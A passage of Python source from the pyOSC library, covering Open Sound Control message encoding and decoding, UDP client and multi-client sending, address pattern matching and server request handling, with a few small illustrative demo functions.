binary = struct.pack(">d", float(next))
tag = 'd'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'f':
try:
binary = struct.pack(">f", float(next))
tag = 'f'
except ValueError:
binary = OSCString(next)
tag = 's'
elif typehint == 'i':
try:
binary = struct.pack(">i", int(next))
tag = 'i'
except ValueError:
binary = OSCString(next)
tag = 's'
else:
binary = OSCString(next)
tag = 's'
return (tag, binary)
def OSCTimeTag(time):
"""Convert a time in floating seconds to its
OSC binary representation
"""
if time > 0:
fract, secs = math.modf(time)
secs = secs - NTP_epoch
binary = struct.pack('>LL', long(secs), long(fract * NTP_units_per_second))
else:
binary = struct.pack('>LL', 0, 1)
return binary
######
#
# OSCMessage decoding functions
#
######
def _readString(data):
"""Reads the next (null-terminated) block of data
"""
length = string.find(data,"\0")
nextData = int(math.ceil((length+1) / 4.0) * 4)
return (data[0:length], data[nextData:])
def _readBlob(data):
"""Reads the next (numbered) block of data
"""
length = struct.unpack(">i", data[0:4])[0]
nextData = int(math.ceil((length) / 4.0) * 4) + 4
return (data[4:length+4], data[nextData:])
def _readInt(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit integer. """
if(len(data)<4):
print("Error: too few bytes for int", data, len(data))
rest = data
integer = 0
else:
integer = struct.unpack(">i", data[0:4])[0]
rest = data[4:]
return (integer, rest)
def _readLong(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit signed integer.
"""
high, low = struct.unpack(">ll", data[0:8])
big = (long(high) << 32) + low
rest = data[8:]
return (big, rest)
def _readTimeTag(data):
"""Tries to interpret the next 8 bytes of the data
as a TimeTag.
"""
high, low = struct.unpack(">LL", data[0:8])
if (high == 0) and (low <= 1):
time = 0.0
else:
time = int(NTP_epoch + high) + float(low) / NTP_units_per_second # float() before dividing, so integer division doesn't truncate the fraction
rest = data[8:]
return (time, rest)
def _readFloat(data):
"""Tries to interpret the next 4 bytes of the data
as a 32-bit float.
"""
if(len(data)<4):
print("Error: too few bytes for float", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">f", data[0:4])[0]
rest = data[4:]
return (float, rest)
def _readDouble(data):
"""Tries to interpret the next 8 bytes of the data
as a 64-bit float.
"""
if(len(data)<8):
print("Error: too few bytes for double", data, len(data))
rest = data
float = 0
else:
float = struct.unpack(">d", data[0:8])[0]
rest = data[8:]
return (float, rest)
def decodeOSC(data):
"""Converts a binary OSC message to a Python list.
"""
table = {"i":_readInt, "f":_readFloat, "s":_readString, "b":_readBlob, "d":_readDouble, "t":_readTimeTag}
decoded = []
address, rest = _readString(data)
if address.startswith(","):
typetags = address
address = ""
else:
typetags = ""
if address == "#bundle":
time, rest = _readTimeTag(rest)
decoded.append(address)
decoded.append(time)
while len(rest)>0:
length, rest = _readInt(rest)
decoded.append(decodeOSC(rest[:length]))
rest = rest[length:]
elif len(rest)>0:
if not len(typetags):
typetags, rest = _readString(rest)
decoded.append(address)
decoded.append(typetags)
if typetags.startswith(","):
for tag in typetags[1:]:
value, rest = table[tag](rest)
decoded.append(value)
else:
raise OSCError("OSCMessage's typetag-string lacks the magic ','")
return decoded
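# --- Editor's illustrative sketch (not part of the original pyOSC source) ---
# Encodes an OSCMessage to its binary wire format and decodes it again with
# decodeOSC(), without any networking involved.
def _demo_message_roundtrip():
    msg = OSCMessage("/demo/address")
    msg.append(440)          # typetag 'i'
    msg.append(0.5)          # typetag 'f'
    msg.append("hello")      # typetag 's'
    decoded = decodeOSC(msg.getBinary())
    # decoded == ['/demo/address', ',ifs', 440, 0.5, 'hello']
    return decoded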
######
#
# Utility functions
#
######
def hexDump(bytes):
""" Useful utility; prints the string in hexadecimal.
"""
print("byte 0 1 2 3 4 5 6 7 8 9 A B C D E F")
num = len(bytes)
for i in range(num):
if (i) % 16 == 0:
line = "%02X0 : " % (i/16)
line += "%02X " % ord(bytes[i])
if (i+1) % 16 == 0:
print("%s: %s" % (line, repr(bytes[i-15:i+1])))
line = ""
bytes_left = num % 16
if bytes_left:
print("%s: %s" % (line.ljust(54), repr(bytes[-bytes_left:])))
def getUrlStr(*args):
"""Convert provided arguments to a string in 'host:port/prefix' format
Args can be:
- (host, port)
- (host, port), prefix
- host, port
- host, port, prefix
"""
if not len(args):
return ""
if type(args[0]) == tuple:
host = args[0][0]
port = args[0][1]
args = args[1:]
else:
host = args[0]
port = args[1]
args = args[2:]
if len(args):
prefix = args[0]
else:
prefix = ""
if len(host) and (host != '0.0.0.0'):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
else:
host = 'localhost'
if type(port) == int:
return "%s:%d%s" % (host, port, prefix)
else:
return host + prefix
def parseUrlStr(url):
"""Convert provided string in 'host:port/prefix' format to it's components
Returns ((host, port), prefix)
"""
if not (type(url) in (str,) and len(url)):
return (None, '')
i = url.find("://")
if i > -1:
url = url[i+3:]
i = url.find(':')
if i > -1:
host = url[:i].strip()
tail = url[i+1:].strip()
else:
host = ''
tail = url
for i in range(len(tail)):
if not tail[i].isdigit():
break
else:
i += 1
portstr = tail[:i].strip()
tail = tail[i:].strip()
found = len(tail)
for c in ('/', '+', '-', '*'):
i = tail.find(c)
if (i > -1) and (i < found):
found = i
head = tail[:found].strip()
prefix = tail[found:].strip()
prefix = prefix.strip('/')
if len(prefix) and prefix[0] not in ('+', '-', '*'):
prefix = '/' + prefix
if len(head) and not len(host):
host = head
if len(host):
try:
host = socket.gethostbyname(host)
except socket.error:
pass
try:
port = int(portstr)
except ValueError:
port = None
return ((host, port), prefix)
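# --- Editor's illustrative sketch (not part of the original pyOSC source) ---
# parseUrlStr() splits a 'host:port/prefix' string into ((host, port), prefix)
# and getUrlStr() builds one back up; 'localhost:9000' is an example value only.
def _demo_url_helpers():
    (addr, prefix) = parseUrlStr("localhost:9000/filter")
    # addr -> ('127.0.0.1', 9000) after name resolution, prefix -> '/filter'
    return getUrlStr(addr, prefix)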
######
#
# OSCClient class
#
######
class OSCClient(object):
"""Simple OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
def __init__(self, server=None):
"""Construct an OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
self.socket = None
self.setServer(server)
self.client_address = None
def _setSocket(self, skt):
"""Set and configure client socket"""
if self.socket != None:
self.close()
self.socket = skt
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self._fd = self.socket.fileno()
def _ensureConnected(self, address):
"""Make sure client has a socket connected to address"""
if not self.socket:
if len(address) == 4:
address_family = socket.AF_INET6
else:
address_family = socket.AF_INET
self._setSocket(socket.socket(address_family, socket.SOCK_DGRAM))
self.socket.connect(address)
def setServer(self, server):
"""Associate this Client with given server.
The Client will send from the Server's socket.
The Server will use this Client instance to send replies.
"""
if server == None:
if hasattr(self,'server') and self.server:
if self.server.client != self:
raise OSCClientError("Internal inconsistency")
self.server.client.close()
self.server.client = None
self.server = None
return
if not isinstance(server, OSCServer):
raise ValueError("'server' argument is not a valid OSCServer object")
self._setSocket(server.socket.dup())
self.server = server
if self.server.client != None:
self.server.client.close()
self.server.client = self
def close(self):
"""Disconnect & close the Client's socket
"""
if self.socket != None:
self.socket.close()
self.socket = None
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
if self.socket and other.socket:
sockEqual = (self.socket._sock == other.socket._sock) # cmp() returned 0 (falsy) for equal sockets
else:
sockEqual = (self.socket == None and other.socket == None)
if not sockEqual:
return False
if self.server and other.server:
return (self.server == other.server) # cmp() returned 0 (falsy) when equal
else:
return self.server == None and other.server == None
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the remote server this client is
connected to or None if not connected to any server.
"""
try:
if self.socket:
return self.socket.getpeername()
else:
return None
except socket.error:
return None
def connect(self, address):
"""Bind to a specific OSC server:
the 'address' argument is a (host, port) tuple
- host: hostname of the remote OSC server,
- port: UDP-port the remote OSC server listens to.
"""
try:
self._ensureConnected(address)
self.client_address = address
except socket.error as e:
self.client_address = None
raise OSCClientError("SocketError: %s" % str(e))
if self.server != None:
self.server.return_port = address[1]
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage to the specified address.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifying remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self._ensureConnected(address)
self.socket.sendall(msg.getBinary())
if self.client_address:
self.socket.connect(self.client_address)
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
def send(self, msg, timeout=None):
"""Send the given OSCMessage.
The Client must be already connected.
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket,
or when the Client isn't connected to a remote server.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
if not self.socket:
raise OSCClientError("Called send() on non-connected client")
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
self.socket.sendall(msg.getBinary())
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending: %s" % str(e))
######
#
# FilterString Utility functions
#
######
def parseFilterStr(args):
"""Convert Message-Filter settings in '+<addr> -<addr> ...' format to a dict of the form
{ '<addr>':True, '<addr>':False, ... }
Returns a list: ['<prefix>', filters]
"""
out = {}
if type(args) in (str,):
args = [args]
prefix = None
for arg in args:
head = None
for plus in arg.split('+'):
minus = plus.split('-')
plusfs = minus.pop(0).strip()
if len(plusfs):
plusfs = '/' + plusfs.strip('/')
if (head == None) and (plusfs != "/*"):
head = plusfs
elif len(plusfs):
if plusfs == '/*':
out = { '/*':True } # reset all previous filters
else:
out[plusfs] = True
for minusfs in minus:
minusfs = minusfs.strip()
if len(minusfs):
minusfs = '/' + minusfs.strip('/')
if minusfs == '/*':
out = { '/*':False } # reset all previous filters
else:
out[minusfs] = False
if prefix == None:
prefix = head
return [prefix, out]
def getFilterStr(filters):
"""Return the given 'filters' dict as a list of
'+<addr>' | '-<addr>' filter-strings
"""
if not len(filters):
return []
if '/*' in filters.keys():
if filters['/*']:
out = ["+/*"]
else:
out = ["-/*"]
else:
if False in filters.values():
out = ["+/*"]
else:
out = ["-/*"]
for (addr, bool) in filters.items():
if addr == '/*':
continue
if bool:
out.append("+%s" % addr)
else:
out.append("-%s" % addr)
return out
# A translation-table for mapping OSC-address expressions to Python 're' expressions
OSCtrans = string.maketrans("{,}?","(|).")
def getRegEx(pattern):
"""Compiles and returns a 'regular expression' object for the given address-pattern.
"""
# Translate OSC-address syntax to python 're' syntax
pattern = pattern.replace(".", r"\.") # first, escape all '.'s in the pattern.
pattern = pattern.replace("(", r"\(") # escape all '('s.
pattern = pattern.replace(")", r"\)") # escape all ')'s.
pattern = pattern.replace("*", r".*") # replace a '*' by '.*' (match 0 or more characters)
pattern = pattern.translate(OSCtrans) # change '?' to '.' and '{,}' to '(|)'
return re.compile(pattern)
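# --- Editor's illustrative sketch (not part of the original pyOSC source) ---
# Demonstrates OSC-address wildcard matching via getRegEx() and the
# '+<addr> -<addr>' filter strings handled by parseFilterStr()/getFilterStr().
def _demo_patterns_and_filters():
    expr = getRegEx("/synth/*/freq")
    assert expr.match("/synth/1/freq")
    (prefix, filters) = parseFilterStr("/synth +/noise -/debug")
    # prefix -> '/synth', filters -> {'/noise': True, '/debug': False}
    return getFilterStr(filters)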
######
#
# OSCMultiClient class
#
######
class OSCMultiClient(OSCClient):
"""'Multiple-Unicast' OSC Client. Handles the sending of OSC-Packets (OSCMessage or OSCBundle) via a UDP-socket
This client keeps a dict of 'OSCTargets', and sends each OSCMessage to each OSCTarget.
The OSCTargets are simply (host, port) tuples, and may be associated with an OSC-address prefix.
The OSCTarget's prefix gets prepended to each OSCMessage sent to that target.
"""
def __init__(self, server=None):
"""Construct a "Multi" OSC Client.
- server: Local OSCServer-instance this client will use the socket of for transmissions.
If none is supplied, a socket will be created.
"""
super(OSCMultiClient, self).__init__(server)
self.targets = {}
def _searchHostAddr(self, host):
"""Search the subscribed OSCTargets for (the first occurence of) given host.
Returns a (host, port) tuple
"""
try:
host = socket.gethostbyname(host)
except socket.error:
pass
for addr in self.targets.keys():
if host == addr[0]:
return addr
raise NotSubscribedError((host, None))
def _updateFilters(self, dst, src):
"""Update a 'filters' dict with values form another 'filters' dict:
- src[a] == True and dst[a] == False: del dst[a]
- src[a] == False and dst[a] == True: del dst[a]
- a not in dst: dst[a] == src[a]
"""
if '/*' in src.keys(): # reset filters
dst.clear() # 'match everything' == no filters
if not src.pop('/*'):
dst['/*'] = False # 'match nothing'
for (addr, bool) in src.items():
if (addr in dst.keys()) and (dst[addr] != bool):
del dst[addr]
else:
dst[addr] = bool
def _setTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
- address ((host, port) tuple): IP-address & UDP-port
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if address not in self.targets.keys():
self.targets[address] = ["",{}]
if prefix != None:
if len(prefix):
# make sure prefix starts with ONE '/', and does not end with '/'
prefix = '/' + prefix.strip('/')
self.targets[address][0] = prefix
if filters != None:
if type(filters) in (str,):
(_, filters) = parseFilterStr(filters)
elif type(filters) != dict:
raise TypeError("'filters' argument must be a dict with {addr:bool} entries")
self._updateFilters(self.targets[address][1], filters)
def setOSCTarget(self, address, prefix=None, filters=None):
"""Add (i.e. subscribe) a new OSCTarget, or change the prefix for an existing OSCTarget.
the 'address' argument can be a ((host, port) tuple) : The target server address & UDP-port
or a 'host' (string) : The host will be looked-up
- prefix (string): The OSC-address prefix prepended to the address of each OSCMessage
sent to this OSCTarget (optional)
"""
if type(address) in (str,):
address = self._searchHostAddr(address)
elif (type(address) == tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except:
pass
address = (host, port)
else:
raise TypeError("'address' argument must be a (host, port) tuple or a 'host' string")
self._setTarget(address, prefix, filters)
def setOSCTargetFromStr(self, url):
"""Adds or modifies a subscribed OSCTarget from the given string, which should be in the
'<host>:<port>[/<prefix>] [+/<filter>]|[-/<filter>] ...' format.
"""
(addr, tail) = parseUrlStr(url)
(prefix, filters) = parseFilterStr(tail)
self._setTarget(addr, prefix, filters)
def _delTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument must be a (host, port) tuple.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
try:
if prefix == None:
del self.targets[address]
elif prefix == self.targets[address][0]:
del self.targets[address]
except KeyError:
raise NotSubscribedError(address, prefix)
def delOSCTarget(self, address, prefix=None):
"""Delete the specified OSCTarget from the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the Target is only deleted if the address and prefix match.
"""
if type(address) in (str,):
address = self._searchHostAddr(address)
if type(address) == tuple:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
self._delTarget(address, prefix)
def hasOSCTarget(self, address, prefix=None):
"""Return True if the given OSCTarget exists in the Client's dict.
the 'address' argument can be a ((host, port) tuple), or a hostname.
If the 'prefix' argument is given, the return-value is only True if the address and prefix match.
"""
if type(address) in (str,):
address = self._searchHostAddr(address)
if type(address) == tuple:
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if address in self.targets.keys():
if prefix == None:
return True
elif prefix == self.targets[address][0]:
return True
return False
def getOSCTargets(self):
"""Returns the dict of OSCTargets: {addr:[prefix, filters], ...}
"""
out = {}
for ((host, port), pf) in self.targets.items():
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
out[(host, port)] = pf
return out
def getOSCTarget(self, address):
"""Returns the OSCTarget matching the given address as a ((host, port), [prefix, filters]) tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, ['',{}]) if address not found.
"""
if type(address) in (str,):
address = self._searchHostAddr(address)
if (type(address) == tuple):
(host, port) = address[:2]
try:
host = socket.gethostbyname(host)
except socket.error:
pass
address = (host, port)
if (address in self.targets.keys()):
try:
(host, _, _) = socket.gethostbyaddr(host)
except socket.error:
pass
return ((host, port), self.targets[address])
return (None, ['',{}])
def clearOSCTargets(self):
"""Erases all OSCTargets from the Client's dict
"""
self.targets = {}
def updateOSCTargets(self, dict):
"""Update the Client's OSCTargets dict with the contents of 'dict'
The given dict's items MUST be of the form
{ (host, port):[prefix, filters], ... }
"""
for ((host, port), (prefix, filters)) in dict.items():
val = [prefix, {}]
self._updateFilters(val[1], filters)
try:
host = socket.gethostbyname(host)
except socket.error:
pass
self.targets[(host, port)] = val
def getOSCTargetStr(self, address):
"""Returns the OSCTarget matching the given address as a ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuple.
'address' can be a (host, port) tuple, or a 'host' (string), in which case the first matching OSCTarget is returned
Returns (None, []) if address not found.
"""
(addr, (prefix, filters)) = self.getOSCTarget(address)
if addr == None:
return (None, [])
return ("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters))
def getOSCTargetStrings(self):
"""Returns a list of all OSCTargets as ('osc://<host>:<port>[<prefix>]', ['<filter-string>', ...])' tuples.
"""
out = []
for (addr, (prefix, filters)) in self.targets.items():
out.append(("osc://%s" % getUrlStr(addr, prefix), getFilterStr(filters)))
return out
def connect(self, address):
"""The OSCMultiClient isn't allowed to connect to any specific
address.
"""
return NotImplemented
def sendto(self, msg, address, timeout=None):
"""Send the given OSCMessage.
The specified address is ignored. Instead this method calls send() to
send the message to all subscribed clients.
- msg: OSCMessage (or OSCBundle) to be sent
- address: (host, port) tuple specifying remote server to send the message to
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
self.send(msg, timeout)
def _filterMessage(self, filters, msg):
"""Checks the given OSCMessge against the given filters.
'filters' is a dict containing OSC-address:bool pairs.
If 'msg' is an OSCBundle, recursively filters its constituents.
Returns None if the message is to be filtered, else returns the message.
or
Returns a copy of the OSCBundle with the filtered messages removed.
"""
if isinstance(msg, OSCBundle):
out = msg.copy()
msgs = out.values()
out.clearData()
for m in msgs:
m = self._filterMessage(filters, m)
if m: # this catches 'None' and empty bundles.
out.append(m)
elif isinstance(msg, OSCMessage):
if '/*' in filters.keys():
if filters['/*']:
out = msg
else:
out = None
elif False in filters.values():
out = msg
else:
out = None
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
expr = getRegEx(msg.address)
for addr in filters.keys():
if addr == '/*':
continue
match = expr.match(addr)
if match and (match.end() == len(addr)):
if filters[addr]:
out = msg
else:
out = None
break
return out
def _prefixAddress(self, prefix, msg):
"""Makes a copy of the given OSCMessage, then prepends the given prefix to
The message's OSC-address.
If 'msg' is an OSCBundle, recursively prepends the prefix to its constituents.
"""
out = msg.copy()
if isinstance(msg, OSCBundle):
msgs = out.values()
out.clearData()
for m in msgs:
out.append(self._prefixAddress(prefix, m))
elif isinstance(msg, OSCMessage):
out.setAddress(prefix + out.address)
else:
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
return out
def send(self, msg, timeout=None):
"""Send the given OSCMessage to all subscribed OSCTargets
- msg: OSCMessage (or OSCBundle) to be sent
- timeout: A timeout value for attempting to send. If timeout == None,
this call blocks until socket is available for writing.
Raises OSCClientError when timing out while waiting for the socket.
"""
for (address, (prefix, filters)) in self.targets.items():
if len(filters):
out = self._filterMessage(filters, msg)
if not out: # this catches 'None' and empty bundles.
continue
else:
out = msg
if len(prefix):
out = self._prefixAddress(prefix, msg)
binary = out.getBinary()
ret = select.select([],[self._fd], [], timeout)
try:
ret[1].index(self._fd)
except:
# for the very rare case this might happen
raise OSCClientError("Timed out waiting for file descriptor")
try:
while len(binary):
sent = self.socket.sendto(binary, address)
binary = binary[sent:]
except socket.error as e:
if e[0] in (7, 65): # 7 = 'no address associated with nodename', 65 = 'no route to host'
raise e
else:
raise OSCClientError("while sending to %s: %s" % (str(address), str(e)))
class OSCAddressSpace:
def __init__(self):
self.callbacks = {}
def addMsgHandler(self, address, callback):
"""Register a handler for an OSC-address
- 'address' is the OSC address-string.
the address-string should start with '/' and may not contain '*'
- 'callback' is the function called for incoming OSCMessages that match 'address'.
The callback-function will be called with the same arguments as the 'msgPrinter_handler' below
"""
for chk in '*?,[]{}# ':
if chk in address:
raise OSCServerError("OSC-address string may not contain any characters in '*?,[]{}# '")
if type(callback) not in (types.FunctionType, types.MethodType):
raise OSCServerError("Message callback '%s' is not callable" % repr(callback))
if address != 'default':
address = '/' + address.strip('/')
self.callbacks[address] = callback
def delMsgHandler(self, address):
"""Remove the registered handler for the given OSC-address
"""
del self.callbacks[address]
def getOSCAddressSpace(self):
"""Returns a list containing all OSC-addresses registerd with this Server.
"""
return self.callbacks.keys()
def dispatchMessage(self, pattern, tags, data, client_address):
"""Attmept to match the given OSC-address pattern, which may contain '*',
against all callbacks registered with the OSCServer.
Calls the matching callback and returns whatever it returns.
If no match is found, and a 'default' callback is registered, it calls that one,
or raises NoCallbackError if a 'default' callback is not registered.
- pattern (string): The OSC-address of the received message
- tags (string): The OSC-typetags of the received message's arguments, without ','
- data (list): The message arguments
"""
if len(tags) != len(data):
raise OSCServerError("Malformed OSC-message; got %d typetags [%s] vs. %d values" % (len(tags), tags, len(data)))
expr = getRegEx(pattern)
replies = []
matched = 0
for addr in self.callbacks.keys():
match = expr.match(addr)
if match and (match.end() == len(addr)):
reply = self.callbacks[addr](pattern, tags, data, client_address)
matched += 1
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks[addr], type(reply)))
if matched == 0:
if 'default' in self.callbacks:
reply = self.callbacks['default'](pattern, tags, data, client_address)
if isinstance(reply, OSCMessage):
replies.append(reply)
elif reply != None:
raise TypeError("Message-callback %s did not return OSCMessage or None: %s" % (self.server.callbacks['default'], type(reply)))
else:
raise NoCallbackError(pattern)
return replies
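# --- Editor's illustrative sketch (not part of the original pyOSC source) ---
# Registers a callback on an OSCAddressSpace and dispatches an already-decoded
# message to it directly, without any server or socket involved.
def _demo_address_space():
    space = OSCAddressSpace()
    def volume_handler(addr, tags, data, client_address):
        print("volume ->", addr, data)
    space.addMsgHandler("/mixer/volume", volume_handler)
    return space.dispatchMessage("/mixer/volume", "f", [0.75], ("127.0.0.1", 0))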
######
#
# OSCRequestHandler classes
#
######
class OSCRequestHandler(DatagramRequestHandler):
"""RequestHandler class for the OSCServer
"""
def setup(self):
"""Prepare RequestHandler.
Unpacks request as (packet, source socket address)
Creates an empty list for replies.
"""
(self.packet, self.socket) = self.request
self.replies = []
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def handle(self):
"""Handle incoming OSCMessage
"""
decoded = decodeOSC(self.packet)
if not len(decoded):
return
self._unbundle(decoded)
def finish(self):
"""Finish handling OSCMessage.
Send any reply returned by the callback(s) back to the originating client
as an OSCMessage or OSCBundle
"""
if self.server.return_port:
self.client_address = (self.client_address[0], self.server.return_port)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
return
self.server.client.sendto(msg, self.client_address)
class ThreadingOSCRequestHandler(OSCRequestHandler):
"""Multi-threaded OSCRequestHandler;
Starts a new RequestHandler thread for each unbundled OSCMessage
"""
def _unbundle(self, decoded):
"""Recursive bundle-unpacking function
This version starts a new thread for each sub-Bundle found in the Bundle,
then waits for all its children to finish.
"""
if decoded[0] != "#bundle":
self.replies += self.server.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.client_address)
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
now = time.time()
children = []
for msg in decoded[2:]:
t = threading.Thread(target = self._unbundle, args = (msg,))
t.start()
children.append(t)
# wait for all children to terminate
for t in children:
t.join()
######
#
# OSCServer classes
#
######
class OSCServer(UDPServer, OSCAddressSpace):
"""A Synchronous OSCServer
Serves one request at-a-time, until the OSCServer is closed.
The OSC address-pattern is matched against a set of OSC-addresses
that have been registered to the server with a callback-function.
If the address-pattern of the message matches the registered address of a callback,
that function is called.
"""
# set the RequestHandlerClass, will be overridden by ForkingOSCServer & ThreadingOSCServer
RequestHandlerClass = OSCRequestHandler
# define a socket timeout, so the serve_forever loop can actually exit.
socket_timeout = 1
# DEBUG: print error-tracebacks (to stderr)?
print_tracebacks = False
def __init__(self, server_address, client=None, return_port=0):
"""Instantiate an OSCServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens on
- client (OSCClient instance): The OSCClient used to send replies from this server.
If none is supplied (default) an OSCClient will be created.
- return_port (int): if supplied, sets the default UDP destination-port
for replies coming from this server.
"""
UDPServer.__init__(self, server_address, self.RequestHandlerClass)
OSCAddressSpace.__init__(self)
self.setReturnPort(return_port)
self.error_prefix = ""
self.info_prefix = "/info"
self.socket.settimeout(self.socket_timeout)
self.running = False
self.client = None
if client == None:
self.client = OSCClient(server=self)
else:
self.setClient(client)
def setClient(self, client):
"""Associate this Server with a new local Client instance, closing the Client this Server is currently using.
"""
if not isinstance(client, OSCClient):
raise ValueError("'client' argument is not a valid OSCClient object")
if client.server != None:
raise OSCServerError("Provided OSCClient already has an OSCServer-instance: %s" % str(client.server))
# Server socket is already listening at this point, so we can't use the client's socket.
# we'll have to force our socket on the client...
client_address = client.address() # client may be already connected
client.close() # shut-down that socket
# force our socket upon the client
client.setServer(self)
if client_address:
client.connect(client_address)
if not self.return_port:
self.return_port = client_address[1]
def serve_forever(self):
"""Handle one request at a time until server is closed."""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def close(self):
"""Stops serving requests, closes server (socket), closes used client
"""
self.running = False
self.client.close()
self.server_close()
def __str__(self):
"""Returns a string containing this Server's Class-name, software-version and local bound address (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.address()
if addr:
out += " listening on osc://%s" % getUrlStr(addr)
else:
out += " (unbound)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
return (self.socket._sock == other.socket._sock) # cmp() returned 0 (falsy) for equal sockets
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
def address(self):
"""Returns a (host,port) tuple of the local address this server is bound to,
or None if not bound to any address.
"""
try:
return self.socket.getsockname()
except socket.error:
return None
def setReturnPort(self, port):
"""Set the destination UDP-port for replies returning from this server to the remote client
"""
if (port > 1024) and (port < 65536):
self.return_port = port
else:
self.return_port = None
def setSrvInfoPrefix(self, pattern):
"""Set the first part of OSC-address (pattern) this server will use to reply to server-info requests.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.info_prefix = pattern
def setSrvErrorPrefix(self, pattern=""):
"""Set the OSC-address (pattern) this server will use to report errors occuring during
received message handling to the remote client.
If pattern is empty (default), server-errors are not reported back to the client.
"""
if len(pattern):
pattern = '/' + pattern.strip('/')
self.error_prefix = pattern
def addDefaultHandlers(self, prefix="", info_prefix="/info", error_prefix="/error"):
"""Register a default set of OSC-address handlers with this Server:
- 'default' -> noCallback_handler
the given prefix is prepended to all other callbacks registered by this method:
- '<prefix><info_prefix>' -> serverInfo_handler
- '<prefix><error_prefix>' -> msgPrinter_handler
- '<prefix>/print' -> msgPrinter_handler
and, if the used Client supports it;
- '<prefix>/subscribe' -> subscription_handler
- '<prefix>/unsubscribe' -> subscription_handler
Note: the given 'error_prefix' argument is also set as default 'error_prefix' for error-messages
*sent from* this server. This is ok, because error-messages generally do not elicit a reply from the receiver.
To do this with the serverInfo-prefixes would be a bad idea, because if a request received on '/info' (for example)
would send replies to '/info', this could potentially cause a never-ending loop of messages!
Do *not* set the 'info_prefix' here (for incoming serverinfo requests) to the same value as given to
the setSrvInfoPrefix() method (for *replies* to incoming serverinfo requests).
For example, use '/info' for incoming requests, and '/inforeply' or '/serverinfo' or even just '/print' as the
info-reply prefix.
"""
self.error_prefix = error_prefix
self.addMsgHandler('default', self.noCallback_handler)
self.addMsgHandler(prefix + info_prefix, self.serverInfo_handler)
self.addMsgHandler(prefix + error_prefix, self.msgPrinter_handler)
self.addMsgHandler(prefix + '/print', self.msgPrinter_handler)
if isinstance(self.client, OSCMultiClient):
self.addMsgHandler(prefix + '/subscribe', self.subscription_handler)
self.addMsgHandler(prefix + '/unsubscribe', self.subscription_handler)
